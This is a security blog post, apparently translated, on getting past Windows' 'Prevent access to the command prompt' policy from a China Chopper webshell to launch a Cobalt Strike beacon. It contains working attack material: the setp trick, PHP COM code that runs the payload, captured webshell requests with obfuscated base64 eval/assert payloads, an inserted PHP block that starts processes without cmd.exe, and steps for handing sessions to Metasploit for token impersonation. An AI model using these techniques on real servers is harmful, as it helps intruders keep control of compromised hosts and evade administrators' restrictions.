Group policy disables command prompt bypass
2022-06-24 07:30:00 【Xiaoxiang Xin'an】
Statement: most of the content on this official account comes from the author's daily notes; a few articles are reposted from other official accounts with the original author's permission. Reposting without authorization is strictly prohibited; if you want to repost, get in touch first. Do not use the techniques in this article for unauthorized testing; the author and the official account bear no responsibility for any adverse consequences.
0x01 Preface
A few days ago a friend messaged me about a problem running commands. The web environment was built with phpStudy, and commands could not be executed in the China Chopper (中国菜刀) virtual terminal; the error was "The command prompt has been disabled by your administrator". He asked whether there was a way around it. There is, so let's look at how to bypass this Group Policy restriction on command execution.
As everyone knows, phpStudy's Apache runs by default as the currently logged-on user or as SYSTEM, which saves the effort of privilege escalation. But being able to execute commands is still a crucial step in post-exploitation: this guy had a high-privilege webshell yet had no idea how to get past this block and get a Cobalt Strike beacon to call back, which is awkward.
0x02 Reproducing the command execution block
First we have to work out why the block appears when a command is executed. I had run into a similar problem before, so I guessed it was caused by some Group Policy setting; after searching, the problem can be reproduced with the following policy.
The setting is as follows:
gpedit.msc -> User Configuration -> Administrative Templates -> System -> Prevent access to the command prompt (optionally also disabling command prompt script processing);
Because this is a User Configuration policy it is written to the logged-on user's own hive (HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD, 1 = cmd.exe blocked but batch scripts allowed, 2 = both blocked), so it only takes effect for that user; it has no effect on Users, SYSTEM, NetworkService and other accounts.
0x03 Command execution bypass in an IIS environment
If the target is an IIS environment, all we need to do is use the setp command in the China Chopper virtual terminal to point the "terminal" at the CS payload, then type a few characters and press Enter. Chopper then spawns the payload instead of cmd.exe and the CS beacon calls back. As long as you avoid spawning cmd.exe, the policy is bypassed.
setp C:\inetpub\wwwroot\artifact.exe
Capturing the traffic with WSExplorer shows that the ASPX shell uses System.Diagnostics to execute commands, which is why setp can be used to specify the process to start. Several fields in the packet are base64 encoded; decoding them shows the path and the command.
pass=Response.Write("->|");var err:Exception;try{eval(System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("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%3D%3D")),"unsafe");}catch(err){Response.Write("ERROR:// "%2Berr.message);}Response.Write("|<-");Response.End();&z1=QzpcaW5ldHB1Ylx3d3dyb290XGFydGlmYWN0LmV4ZQ%3D%3D&z2=Y2QgL2QgIkM6XGluZXRwdWJcd3d3cm9vdFwiJjNoYWQwdyZlY2hvIFtTXSZjZCZlY2hvIFtFXQ%3D%3D
Decoded, z1 is the process to start, C:\inetpub\wwwroot\artifact.exe, and z2 is the command line Chopper hands to it: cd /d "C:\inetpub\wwwroot\"&3had0w&echo [S]&cd&echo [E].
Alternatively, in an ASPX big shell (大马) you can use the whitelist method: fill CmdPath with the path of a whitelisted executable and Argument with the path of the file you want that executable to run, or simply put the CS/MSF payload path in CmdPath and execute it directly.
0x04 Command execution bypass in an Apache environment
The IIS bypass is not available in an Apache environment, so I looked for another way: use PHP's COM extension to call the WScript.Shell component and run the program directly. Replace the path on the third line of the following code with the CS payload. In the end the point is still the same, avoid spawning cmd.exe.
<?php
// Requires the com_dotnet extension (extension=php_com_dotnet.dll in php.ini)
$wsh = new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
// Exec() starts the executable itself; no cmd.exe is involved, so the policy does not apply
$exec = $wsh->exec('C:\ProgramData\artifact.exe');
?>
Why not use system, exec, proc_open and the other common command-execution functions? Because by default they all go through cmd.exe to run the command, so they are still blocked. China Chopper's PHP shell uses proc_open, which is exactly why setp works as a bypass with the ASPX shell but not with the PHP one.
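As an added example (not code from the original post, nor from China Chopper or phpStudy), the following PHP carries the same idea a little further: it reads the DisableCMD policy value for the account PHP actually runs as, starts an executable through WScript.Shell.Exec, and also shows proc_open's Windows-only bypass_shell option, which the post does not mention and which likewise calls CreateProcess without cmd.exe. It assumes Windows, PHP 7 with the com_dotnet extension loaded, and uses C:\Windows\System32\whoami.exe as a placeholder target; the timeout and function names are my own choices.

```php
<?php
// Added example, not from the original post. Two ways to start a process on
// Windows from PHP without spawning cmd.exe, plus a check of the policy value
// for the account the web server runs as.
// Assumptions: Windows, PHP 7.x with com_dotnet loaded
// (extension=php_com_dotnet.dll in php.ini); whoami.exe below is a placeholder.

// "Prevent access to the command prompt" is a per-user policy stored at
// HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD
// (1 = cmd.exe blocked, batch scripts allowed; 2 = both blocked).
// Reading it through WScript.Shell shows the hive of the account PHP runs as.
function cmd_policy_state(): string
{
    if (!class_exists('COM')) {
        return 'com-unavailable';                       // com_dotnet not loaded
    }
    $wsh = new COM('WScript.Shell');
    try {
        $v = (int) $wsh->RegRead('HKCU\Software\Policies\Microsoft\Windows\System\DisableCMD');
    } catch (com_exception $e) {
        return 'not-set';                               // RegRead throws if the value is absent
    }
    $states = [1 => 'cmd-blocked', 2 => 'cmd-and-scripts-blocked'];
    return $states[$v] ?? 'not-set';
}

// Quote the executable and each argument the way CreateProcess expects.
function build_cmdline(string $exe, array $args): string
{
    $quoted = array_map(function ($p) {
        return '"' . str_replace('"', '\\"', $p) . '"';
    }, array_merge([$exe], $args));
    return implode(' ', $quoted);
}

// Way 1: WScript.Shell.Exec calls CreateProcess on the command line itself,
// so no cmd.exe is created and the policy never comes into play.
function run_via_com(string $exe, array $args = [], int $timeout_s = 10): array
{
    $wsh  = new COM('WScript.Shell');
    $proc = $wsh->Exec(build_cmdline($exe, $args));     // WshScriptExec object
    $deadline = time() + $timeout_s;
    while ((int) $proc->Status === 0 && time() < $deadline) {   // 0 = WshRunning
        usleep(100000);
    }
    $done = ((int) $proc->Status === 1);                // 1 = WshFinished
    // ReadAll() blocks until the pipe closes, so only read it once the
    // process has exited; a long-lived payload such as a beacon is left running.
    return [
        'pid'    => (int) $proc->ProcessID,
        'done'   => $done,
        'stdout' => $done ? (string) $proc->StdOut->ReadAll() : '',
        'stderr' => $done ? (string) $proc->StdErr->ReadAll() : '',
    ];
}

// Way 2: on Windows proc_open normally wraps the command in "cmd.exe /c",
// which is why China Chopper's PHP shell is blocked. With 'bypass_shell'
// set, PHP passes the command line straight to CreateProcess instead.
function run_via_proc_open(string $exe, array $args = []): array
{
    $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open(build_cmdline($exe, $args), $spec, $pipes, null, null,
                      ['bypass_shell' => true]);
    if (!is_resource($proc)) {
        return ['ok' => false, 'exit' => -1, 'stdout' => '', 'stderr' => 'proc_open failed'];
    }
    fclose($pipes[0]);
    $out = stream_get_contents($pipes[1]);
    $err = stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    $code = proc_close($proc);
    return ['ok' => $code === 0, 'exit' => $code, 'stdout' => $out, 'stderr' => $err];
}

// Usage: whoami.exe is a plain executable, so it runs even when cmd.exe is blocked.
echo 'policy for this account: ', cmd_policy_state(), PHP_EOL;
echo run_via_com('C:\Windows\System32\whoami.exe')['stdout'];
echo run_via_proc_open('C:\Windows\System32\whoami.exe', ['/groups'])['stdout'];
```

Both functions take an executable path plus separate arguments rather than a shell string, so nothing is ever parsed by cmd.exe; anything that needs shell syntax (pipes, redirection, built-ins like dir) still has to go through cmd.exe and will still be blocked for an account the policy applies to.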
The China Chopper PHP request captured on the wire looks like this:
pass=array_map("ass"."ert",array("ev"."Al(\"\\\$xx%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtpZihQSFBfVkVSU0lPTjwnNS4zLjAnKXtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO307ZWNobygiWEBZIik7JG09Z2V0X21hZ2ljX3F1b3Rlc19ncGMoKTskcD0nY21kJzskcz0nY2QgL2QgRDpcXHBocFN0dWR5XFxQSFBUdXRvcmlhbFxcV1dXXFxhdlxcMVxcJndob2FtaSZlY2hvIFtTXSZjZCZlY2hvIFtFXSc7JGQ9ZGlybmFtZSgkX1NFUlZFUlsiU0NSSVBUX0ZJTEVOQU1FIl0pOyRjPXN1YnN0cigkZCwwLDEpPT0iLyI%2FIi1jIFwieyRzfVwiIjoiL2MgXCJ7JHN9XCIiOyRyPSJ7JHB9IHskY30iOyRhcnJheT1hcnJheShhcnJheSgicGlwZSIsInIiKSxhcnJheSgicGlwZSIsInciKSxhcnJheSgicGlwZSIsInciKSk7JGZwPXByb2Nfb3Blbigkci4iIDI%2BJjEiLCRhcnJheSwkcGlwZXMpOyRyZXQ9c3RyZWFtX2dldF9jb250ZW50cygkcGlwZXNbMV0pO3Byb2NfY2xvc2UoJGZwKTtwcmludCAkcmV0OztlY2hvKCJYQFkiKTtkaWUoKTs%3D'));\");"))
Decoding the base64 shows the payload setting $p='cmd', building cmd /c "…" around the requested command, and handing that string to proc_open, so it is cmd.exe that gets blocked.
Although the methods above bypass the "Prevent access to the command prompt" policy and get a session on the target host, you still cannot execute system commands directly in that session, because the session's shell commands also go through cmd.exe.
To execute system commands you have to hand the session to MSF and either migrate into another process or impersonate another user's token; when CS spawns an MSF session it uses rundll32, so that step is not blocked either.
At that point the "Prevent access to the command prompt" policy is completely bypassed and system commands execute normally.
OK, that's all for this share, bye!!!